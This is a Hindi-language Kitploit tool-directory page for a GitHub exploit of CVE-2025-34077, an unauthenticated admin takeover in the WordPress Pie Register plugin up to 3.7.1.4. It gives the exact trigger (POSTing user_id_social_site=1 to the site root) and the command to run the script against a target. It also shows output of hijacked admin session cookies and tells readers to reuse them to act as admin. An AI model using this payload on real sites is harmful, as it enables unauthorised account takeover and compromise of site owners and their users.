Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-34077 — WordPress Pie Register ≤ 3.7.1.4 - व्यवस्थापक विशेषाधिकार वृद्धि (बिना प्रमाणीकरण के) | Kitploit
उपकरण/GitHubGitHub/mrjhaxcore/cve-2025-34077
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubmrjhaxcore/cve-2025-34077

CVE-2025-34077

WordPress Pie Register ≤ 3.7.1.4 - व्यवस्थापक विशेषाधिकार वृद्धि (बिना प्रमाणीकरण के)

रिपॉजिटरी देखें
63431 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-34077 — WordPress Pie Register ≤ 3.7.1.4 - एडमिन विशेषाधिकार वृद्धि (अप्रमाणित)

Exploit Status CVE Badge Python

💀 लेखक

Mrj Haxcore

🧠 भेद्यता सारांश

WordPress के लिए Pie Register प्लगइन (संस्करण ≤ 3.7.1.4) एक अप्रमाणित एंडपॉइंट उजागर करता है जो हमलावर को केवल एक विशेष पेलोड POST करके एडमिन सत्रों को हाईजैक करने की अनुमति देता है।

इसका शोषण करने पर उपयोगकर्ता ID 1 के सत्र कुकीज़ चुराना संभव होता है (आमतौर पर admin), बिना किसी लॉगिन क्रेडेंशियल की आवश्यकता के।


📦 प्रभावित सॉफ़्टवेयर

  • प्लगइन नाम: Pie Register
  • संस्करण: <= 3.7.1.4
  • प्लगइन स्लग: pie-register
  • प्लगइन पेज
  • भेद्य डाउनलोड लिंक

📬 भेद्य पैरामीटर:

user_id_social_site=1

जब इसे रूट URL (/) पर POST किया जाता है, तो यह पैरामीटर प्लगइन को हमलावर को ID 1 (आमतौर पर admin) वाले उपयोगकर्ता के रूप में प्रमाणित करने और मान्य सत्र कुकीज़ जारी करने का कारण बनता है।


🔧 आवश्यकताएँ

  • Python 3.x
  • requests, beautifulsoup4 (वैकल्पिक, कुकी पार्सिंग के लिए)

▶️ एक्सप्लॉइट चलाएँ

root@kitploit:~
python3 pie.py http://target.site

---
Output
[*] Sending payload to hijack admin session...

[+] Successfully hijacked cookies for user_id=1 (admin):
    wordpress_sec_xxxxxx = <cookie_value>
    wordpress_logged_in_xxxxxx = <cookie_value>

[!] Use these cookies in your browser or tools like curl or Burp to act as admin.
टूल डाउनलोड करें